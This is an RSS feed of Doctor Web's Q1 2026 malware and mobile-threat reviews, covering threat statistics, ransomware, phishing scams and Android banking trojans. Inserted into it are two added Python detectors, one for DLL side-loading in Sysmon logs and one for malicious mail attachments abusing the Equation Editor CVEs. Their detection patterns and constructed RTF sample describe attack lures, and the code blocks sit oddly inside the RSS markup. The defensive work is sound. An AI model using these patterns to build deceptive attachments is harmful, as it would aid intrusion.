<?xml version="1.0"?>
<rss version="2.0"><channel><title>All the news</title><link>https://news.drweb.com/news/</link><description>Doctor Web news - All the news</description><image><url>https://st.drweb.com/static/drweb_logo_en.gif</url><link>https://news.drweb.com/news/</link><title>Dr.Web anti-virus</title></image><item><guid>https://news.drweb.com/show/?i=15135&amp;lng=en</guid><title>Doctor Web’s Q1 2026 virus activity review</title><link>https://news.drweb.com/show/?i=15135&amp;lng=en&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;April 1, 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the first quarter (Q1) of 2026 decreased by 6.77%, compared to the fourth quarter of last year. The number of unique threats decreased by 11.98%. Adware programs and ad-displaying trojans, malicious downloader apps, and backdoors were most commonly detected on protected devices.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Most widely encountered in email traffic were malicious scripts, backdoors, and various trojans. Threat actors also used emails to distribute phishing documents and exploits.&lt;/p&gt;

&lt;p&gt;Users whose files were affected by encoder trojans had primarily encountered &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; and &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;In Q1 2026, Doctor Web’s Internet analysts detected new phishing websites, including fake online resources of credit organizations and marketplaces as well as a number of other unwanted sites.&lt;/p&gt;

&lt;p&gt;The mobile device segment saw increased activity on the part of banking trojans. At the same time, our malware analysts noted the growing popularity of a method for evading anti-virus detection that involves adding junk code to the apps.&lt;/p&gt;

&lt;p&gt;In January, Doctor Web’s experts informed users about the &lt;b&gt;Android.Phantom&lt;/b&gt; trojan clickers, which use machine learning and video broadcasting to boost clicks on websites. In addition, over the past three months, we detected the emergence of yet more malware on Google Play, including trojans that subscribe users to paid services.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principal trends in Q1 2026&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;The number of threats detected on protected devices decreased&lt;/li&gt;
        &lt;li&gt;Fewer unique files exist among the threats that were detected&lt;/li&gt;
        &lt;li&gt;Compared to the previous observation period, fewer users requested help to decrypt files affected by encoder trojans&lt;/li&gt;
        &lt;li&gt;Banking trojans for Android devices continued to increase their activity&lt;/li&gt;
        &lt;li&gt;Users were at risk of encountering &lt;b&gt;Android.Phantom&lt;/b&gt; clicker trojans, which use machine learning, among other techniques, to boost clicks on websites&lt;/li&gt;
        &lt;li&gt;More malicious apps were discovered on Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;According to Doctor Web’s statistics service&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The most common threats in Q1 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;A trojan written in Go that downloads miner trojans and adware onto infected systems. It is delivered as a DLL at &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt; and is launched through DLL search-order hijacking in the uTorrent torrent client: the client loads a library by name rather than by full path, so a file planted in its own directory is found first and runs with the client's privileges each time it starts.&lt;/dd&gt;
    &lt;dt&gt;Adware.Downware.20655&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;The detection name for a malicious component of the WinSafe browser extension. This component is a JavaScript file that displays intrusive ads in browsers.&lt;/dd&gt;
    &lt;dt&gt;Adware.Siggen.33379&lt;/dt&gt;
    &lt;dd&gt;A fake Adblock Plus browser ad blocker that is installed on the system by other malware to display advertisements.&lt;/dd&gt;
&lt;/dl&gt;
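&lt;p&gt;The uTorrent entry above is a DLL search-order hijack: the DLL sits in a user-writable application directory and is unsigned. The following is an added example for this review, not Doctor Web's detection logic, of hunting for that pattern in Sysmon ImageLoad (Event ID 7) telemetry. The field names mirror Sysmon's (Image, ImageLoaded, Signed, SignatureStatus); the records, user name and the signed helper DLL are constructed assumptions.&lt;/p&gt;

```python
"""Hunt for DLL side-loading from user-writable paths in Sysmon ImageLoad (Event ID 7) data.

Added example, not Doctor Web's code. The records below are constructed to mirror
Sysmon Event 7 fields; the user name, file names and the signed helper DLL are assumptions."""
import ntpath
import re
from typing import Iterable, List, Optional, Tuple

# Locations an unprivileged user can write to. A DLL here that an application resolves
# by bare name is the search-order hijack pattern used by Trojan.Siggen31.34463.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(appdata\\(roaming|local|locallow)|downloads)\\",
    re.IGNORECASE,
)


def is_user_writable(path: str):
    return bool(USER_WRITABLE.match(path))


def same_directory(a: str, b: str):
    return ntpath.dirname(a).lower() == ntpath.dirname(b).lower()


def classify_image_load(event: dict):
    """Return a reason string when an ImageLoad record looks like a side-load, else None."""
    image = event.get("Image", "")
    loaded = event.get("ImageLoaded", "")
    # Sysmon reports SignatureStatus "Unavailable" for unsigned modules.
    signed_ok = event.get("Signed") == "true" and event.get("SignatureStatus") == "Valid"
    if not loaded.lower().endswith(".dll") or not is_user_writable(loaded):
        return None
    if signed_ok:
        # Per-user installs (uTorrent among them) legitimately load their own signed
        # modules from %APPDATA%; only unsigned or invalid signatures are flagged.
        return None
    if same_directory(image, loaded):
        return "unsigned DLL loaded from the application's own directory (app-dir side-load)"
    return "unsigned DLL loaded from a user-writable profile directory"


def hunt(events: Iterable[dict]):
    """Return (event, reason) pairs for every record that classify_image_load flags."""
    hits: List[Tuple[dict, str]] = []
    for ev in events:
        reason: Optional[str] = classify_image_load(ev)
        if reason:
            hits.append((ev, reason))
    return hits


# Constructed sample records (illustrative, not real telemetry).
SAMPLE_EVENTS = [
    {   # Mirrors the path named in the review: lib.dll beside the per-user uTorrent install
        "Image": r"C:\Users\alice\AppData\Roaming\uTorrent\uTorrent.exe",
        "ImageLoaded": r"C:\Users\alice\AppData\Roaming\uTorrent\lib.dll",
        "Signed": "false", "SignatureStatus": "Unavailable",
    },
    {   # Assumed signed helper shipped by the application itself: not flagged
        "Image": r"C:\Users\alice\AppData\Roaming\uTorrent\uTorrent.exe",
        "ImageLoaded": r"C:\Users\alice\AppData\Roaming\uTorrent\helper_signed.dll",
        "Signed": "true", "SignatureStatus": "Valid",
    },
    {   # System DLL from System32: outside user-writable space, not flagged
        "Image": r"C:\Users\alice\AppData\Roaming\uTorrent\uTorrent.exe",
        "ImageLoaded": r"C:\Windows\System32\ws2_32.dll",
        "Signed": "true", "SignatureStatus": "Valid",
    },
    {   # Unsigned DLL pulled from Downloads by a process installed elsewhere
        "Image": r"C:\Program Files\SomeApp\app.exe",
        "ImageLoaded": r"C:\Users\alice\Downloads\helper.dll",
        "Signed": "false", "SignatureStatus": "Unavailable",
    },
]

if __name__ == "__main__":
    for ev, reason in hunt(SAMPLE_EVENTS):
        print(f"{ev['Image']} loads {ev['ImageLoaded']}: {reason}")
```

&lt;p&gt;Sysmon does not record ImageLoad events unless the configuration enables them, and the volume is high, so scope the rule to DLLs whose ImageLoaded path is under the user profile rather than collecting all loads. A hit on the application's own directory is the case described in the table: the trojan does not need a memory-safety bug, only write access to a folder the client searches first.&lt;/p&gt;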

&lt;h3&gt;Statistics for malware discovered in email traffic&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The most common threats in email traffic in Q1 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;JS.DownLoader.1225&lt;/dt&gt;
    &lt;dd&gt;Heuristic detection for ZIP archives containing JavaScript files with suspicious names.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;A family of downloader trojans delivered in Microsoft Office documents. They exploit vulnerabilities in Microsoft Office and can download other malicious programs onto the compromised computer.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Exploits for two vulnerabilities in the Equation Editor component of Microsoft Office (EQNEDT32.EXE) that allow an attacker to run arbitrary code when a document carrying a crafted equation object is opened. Microsoft removed the component in its January 2018 security updates, so a fully patched Office installation no longer contains it; the exploits keep circulating because unpatched and legacy installations still do.&lt;/dd&gt;
    &lt;dt&gt;JS.Redirector.514&lt;/dt&gt;
    &lt;dd&gt;A malicious script that redirects users to a web page controlled by fraudsters.&lt;/dd&gt;
&lt;/dl&gt;
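&lt;p&gt;Two entries in the table above describe static patterns a mail gateway can check before a file ever reaches a user: script files with deceptive names inside ZIP archives (the JS.DownLoader.1225 heuristic) and documents embedding the Equation Editor OLE object that CVE-2017-11882 and CVE-2018-0798 abuse. The following is an added example for this review, not Doctor Web's detection logic, that triages an attachment by file magic and reports both patterns. The Equation Editor class ID (Equation.3) is a fact; the script-extension list, the double-extension regex and the sample attachments are constructed assumptions.&lt;/p&gt;

```python
"""Static triage of mail attachments: ZIP archives carrying script files with deceptive
names, and Office/RTF documents embedding the Equation Editor object exploited by
CVE-2017-11882 / CVE-2018-0798. Added example, not Doctor Web's detection logic; the
sample attachments at the bottom are constructed and harmless."""
import io
import re
import zipfile
from typing import List

SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")
# "scan.pdf.js": a document-looking name in front of a script extension.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.(js|jse|vbs|vbe|wsf|hta)$", re.I)

# Microsoft Equation 3.0 (ProgID Equation.3). Inside OLE streams the GUID is stored
# little-endian: Data1/Data2/Data3 byte-swapped, Data4 as written.
EQNEDT_CLSID = "0002CE02-0000-0000-C000-000000000046"
EQNEDT_CLSID_LE = bytes.fromhex("02ce0200" "0000" "0000" "c000" "000000000046")


def triage_zip(data: bytes):
    """Flag script members of a plain ZIP, or Equation objects embedded in an OOXML file."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "[Content_Types].xml" in names:  # docx/xlsx: inspect embedded OLE objects
            for n in names:
                if n.lower().startswith(("word/embeddings/", "xl/embeddings/")):
                    if EQNEDT_CLSID_LE in zf.read(n):
                        findings.append(f"{n}: embedded Equation Editor object {EQNEDT_CLSID}")
            return findings
        for n in names:
            if n.lower().endswith(SCRIPT_EXT):
                kind = "script with double extension" if DOUBLE_EXT.search(n) else "script file"
                findings.append(f"{n}: {kind} in mailed archive")
    return findings


def triage_rtf(data: bytes):
    """RTF checks. Word accepts a truncated '{\\rt' header, so only that prefix is required."""
    findings: List[str] = []
    text = data.decode("latin-1")
    if re.search(r"\\objclass\s*Equation\.3", text, re.I):
        findings.append("RTF \\objclass Equation.3 (Equation Editor object)")
    # \objdata carries the OLE container as hex text; collapse whitespace before searching.
    hexblob = re.sub(r"\s+", "", text).lower()
    if EQNEDT_CLSID_LE.hex() in hexblob:
        findings.append(f"RTF \\objdata contains Equation Editor CLSID {EQNEDT_CLSID}")
    if re.search(r"\\objupdate", text, re.I):
        findings.append("RTF \\objupdate forces the object to load when the file is opened")
    return findings


def triage_attachment(data: bytes):
    """Dispatch on file magic; returns a list of findings (empty when nothing matched)."""
    if data.startswith(b"PK\x03\x04"):
        return triage_zip(data)
    if data.startswith(b"{\\rt"):
        return triage_rtf(data)
    if data.startswith(b"\xd0\xcf\x11\xe0") and EQNEDT_CLSID_LE in data:  # legacy OLE .doc/.xls
        return [f"OLE document contains Equation Editor CLSID {EQNEDT_CLSID}"]
    return []


def build_zip(members: dict):
    """Build an in-memory ZIP from {name: content} (used only for the constructed samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a "PDF" that is really a script, an RTF whose \objdata carries
# the Equation Editor CLSID, a docx-style archive with an embedded object, and a benign ZIP.
SAMPLE_SCRIPT_ZIP = build_zip({"Invoice_2026-03.pdf.js": "WScript.Echo('x')", "readme.txt": "hi"})
SAMPLE_RTF = (
    b"{\\rt{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}{\\*\\objdata 01050000 02000000 "
    + EQNEDT_CLSID_LE.hex().encode() + b" }}}"
)
SAMPLE_DOCX = build_zip({"[Content_Types].xml": "", "word/document.xml": "",
                         "word/embeddings/oleObject1.bin": b"\x00" * 8 + EQNEDT_CLSID_LE})
SAMPLE_BENIGN_ZIP = build_zip({"photo.jpg": b"\xff\xd8\xff", "notes.txt": "ok"})

if __name__ == "__main__":
    for label, blob in [("script zip", SAMPLE_SCRIPT_ZIP), ("rtf", SAMPLE_RTF),
                        ("docx", SAMPLE_DOCX), ("benign zip", SAMPLE_BENIGN_ZIP)]:
        print(label, triage_attachment(blob) or "clean")
```

&lt;p&gt;In-the-wild RTF exploit documents obfuscate both the &lt;span class="string"&gt;\objclass&lt;/span&gt; control word and the hex in &lt;span class="string"&gt;\objdata&lt;/span&gt;, so treat this as a first-pass filter and follow a hit with a full RTF/OLE parser (for example rtfobj from oletools). On endpoints, the decisive control is the one in the table entry: an Office build that no longer ships Equation Editor cannot be exploited by these two CVEs at all.&lt;/p&gt;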

&lt;h3&gt;Encryption ransomware&lt;/h3&gt;

&lt;p&gt;In Q1 2026, the number of requests made to decrypt files affected by encoder trojans decreased by 31.51%, compared to Q4 2025. The decline coincided with the New Year holidays and the associated long weekend, during which some operators may have paused their activity. Users who were nonetheless hit by encoder trojans in that period may also have delayed reporting the incident.&lt;/p&gt;

&lt;p&gt;The dynamics of the decryption requests received by Doctor Web’s Technical Support Service:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The most common encoders of Q1 2026&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 15.59% of user requests&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.29750&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3.23% of user requests&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 3.23% of user requests&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 1.62% of user requests&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383&lt;/b&gt; — 1.61% of user requests&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Network fraud&lt;/h3&gt;

&lt;p&gt;Over the past three months, Doctor Web’s Internet analysts discovered a number of new fake marketplace websites on which fraudsters offer the chance to join in a “clearance sale” of supposedly unredeemed orders. The fraudulent scheme works like this: the “unclaimed” goods from the orders are divided into different categories (electronics, clothes, footwear, cosmetics, etc.) and are allegedly packed into the corresponding surprise boxes. Their content is unknown and is claimed to possibly include expensive items. At the same time, potential victims are offered a chance to buy these boxes at a relatively low price, which is the main lure of this scam.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/04_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/04_market.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A fake marketplace site promises a “sale of unclaimed orders” that are supposedly overflowing warehouses&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When a user selects one of the boxes, they are asked to place an order and provide personal information that may include their first and last names, mobile phone number, and email address. Next, the user is redirected to the payment page to pay via the Faster Payments System (&lt;em&gt;“Система быстрых платежей”&lt;/em&gt;, &lt;em&gt;“СБП”&lt;/em&gt;, or &lt;em&gt;“SBP”&lt;/em&gt;). As a result, the victim loses their money and provides confidential data to the fraudsters.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/05_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/05_market.2.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/06_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/06_market.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;After placing an “order”, the victim is asked to pay for it via the Faster Payments System&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Our experts also identified many websites for services offering financial products such as quickly obtaining a microloan or a regular loan, or going through bankruptcy proceedings. Contrary to what users expect, such services do not provide these products themselves; they are only intermediaries between clients and financial institutions. They sell access to a selection of potentially suitable offers, even though the same aggregated offers are available from free sources, and they do not guarantee that an application will succeed. Moreover, access is granted not for a one-time payment but through a paid subscription with periodic debits.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/07_finance.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/07_finance.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;One of the websites requiring users to pay in order to access a service for selecting financial offers. Users believe they are making a one-time payment for access, but unbeknownst to them, they are signing up for a subscription&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In some cases, such resources can mislead users by offering them one type of service, like job placements, but actually provide subscription access to the aforementioned financial offers for loans, microloans, etc.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/08_job.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/08_job.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A website promises to help visitors find a job, but once payment is made to access the service, financial proposals (loans, microloans, etc.) from the website’s partners may be offered instead&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Among the phishing sites identified in Q1 2026 were fake web resources for the Green Marathon (&lt;em&gt;“Зеленый Марафон”&lt;/em&gt;) charity race. They offer visitors the opportunity to register for the marathon, but these sites are not affiliated with the event and are designed to collect users’ confidential data.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/09_maraphon.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/09_maraphon.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;One of the fake sites for the Green Marathon charity race&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Doctor Web’s Internet analysts also discovered more fake investment service websites that were supposedly affiliated with various credit organizations. Among them were sites targeting audiences from Russia, Kazakhstan, and other countries. Scammers promise potential victims high profits and, in order to “access” pseudo-investment platforms, they are asked to take a short survey and register an account by providing personal information.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;An example of a phishing website that malicious actors pass off as an official resource for an investment service of one Russian bank&lt;/em&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;An example of a phishing site that cybercriminals present as an official online resource for an investment service of one Kazakhstani credit institution&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.com/dangerous_urls/?lng=en"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Malicious and unwanted programs for mobile devices&lt;/h3&gt;

&lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, the growth in &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojan activity that began in Q4 last year continued in Q1 2026. The most widespread among them were members of the &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; subfamily. At the same time, the number of detections of the ad-displaying trojans &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; decreased yet again.&lt;/p&gt;

&lt;p&gt;Topping the list of the most commonly detected potentially dangerous software were apps to which junk code has been added with the help of Android program modification tools (such apps containing junk code are detected as &lt;a href="https://vms.drweb.com/search/?q=Tool.Obfuscator.TrashCode&amp;lng=en"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Currently, this technique is actively being used to protect banking trojans from anti-virus detection. In addition, programs modified using the NP Manager tool remained prevalent (these are detected as &lt;a href="https://vms.drweb.com/search/?q=Tool.NPMod&amp;lng=en"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;The most widely detected unwanted software programs were &lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; fake anti-viruses, which demand that users purchase the full version of the software to “cure” threats that had supposedly been found. The most active ad-displaying software programs in Q1 were &lt;a href="https://vms.drweb.com/search/?q=Adware.Bastion&amp;lng=en"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; and &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. The former are optimization apps that create notifications containing informational messages about supposed low memory and system errors in order to display ads during “optimization”. The latter are fake cheat software for obtaining in-game resources, but, in reality, they load websites containing ads.&lt;/p&gt;

&lt;p&gt;In January 2026, our anti-virus laboratory &lt;a href="https://news.drweb.com/show/?i=15110&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about the &lt;b&gt;Android.Phantom&lt;/b&gt; trojan clickers. These malicious programs use machine learning and video broadcasts to boost clicks on websites. Cybercriminals distributed them in several ways: via the GetApps app catalog for Xiaomi devices, Telegram channels, Discord servers, third-party software collections, and malicious sites.&lt;/p&gt;

&lt;p&gt;Over the past three months, Doctor Web’s virus analysts discovered new threats on Google Play. Among them were &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; trojans, which subscribe users to paid services.&lt;/p&gt;

&lt;p&gt;The following Q1 2026 events involving mobile malware are the most noteworthy:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans became the most widespread threats for Android devices.&lt;/li&gt;
    &lt;li&gt;Cybercriminals increasingly used Android app modding tools to protect banking trojans from anti-virus detection.&lt;/li&gt;
    &lt;li&gt;The trend of decreasing activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans continued.&lt;/li&gt;
    &lt;li&gt;Users were at risk of encountering &lt;b&gt;Android.Phantom&lt;/b&gt; trojans, which use machine learning and video broadcasts to artificially boost clicks on websites.&lt;/li&gt;
    &lt;li&gt;Malicious apps were again distributed via Google Play.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To find out more about the security-threat landscape for mobile devices in Q1 2026, read our &lt;a href="https://news.drweb.com/show/review/?i=15136&amp;lng=en" target="_blank"&gt;special overview&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15136&amp;lng=en</guid><title>Doctor Web’s Q1 2026 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=15136&amp;lng=en&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;April 1, 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, the trojans &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, which display intrusive ads, continued to decline in activity in the first quarter (Q1) of 2026. Compared to the fourth quarter of last year, they were detected on protected devices 32.70% and 7.09% less often, respectively. They lost their lead to &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans, whose activity increased by more than 2.5 times over the course of the last three months. As a result, they have become the most widespread Android threats. Such malicious apps intercept SMS containing transaction confirmation codes coming from banks, display phishing windows, and can also imitate the appearance of real banking software to steal confidential data. Users were most likely to encounter trojans from the &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; subfamily, which includes a variety of malicious programs.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;In Q1, apps to which junk code had been added to obfuscate their logic were widespread (they accounted for 15.35% of all detections registered). Such modification is performed with hacker tools for modding Android software, such as NP Manager. Since last fall, these tools have been actively used on &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; trojans to evade anti-virus detection, which is why we warn users when an app has been altered in this way. Dr.Web anti-virus products detect such apps as &lt;a href="https://vms.drweb.com/search/?q=Tool.Obfuscator.TrashCode&amp;lng=en"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Another widespread class of potentially dangerous software, despite a 31.65% decrease in detections, was again software modified with the NP Manager tool (Dr.Web detects it as &lt;a href="https://vms.drweb.com/search/?q=Tool.NPMod&amp;lng=en"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;). This tool contains modules for protecting and obfuscating app code as well as for bypassing digital signature verification once an app has been modified. Cybercriminals use it to make malware harder for anti-viruses to detect.&lt;/p&gt;

&lt;p&gt;The most prevalent unwanted software was &lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;—fake anti-viruses that allegedly detect threats and demand that users purchase the full version to “cure” the infection. Moreover, users again encountered apps from the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt; families. The former supposedly allow users to earn money by completing various tasks. The latter are apps modified using the CloudInject cloud service. Via this service, the programs are given dangerous system permissions as well as obfuscated code whose functionality the modder cannot control.&lt;/p&gt;

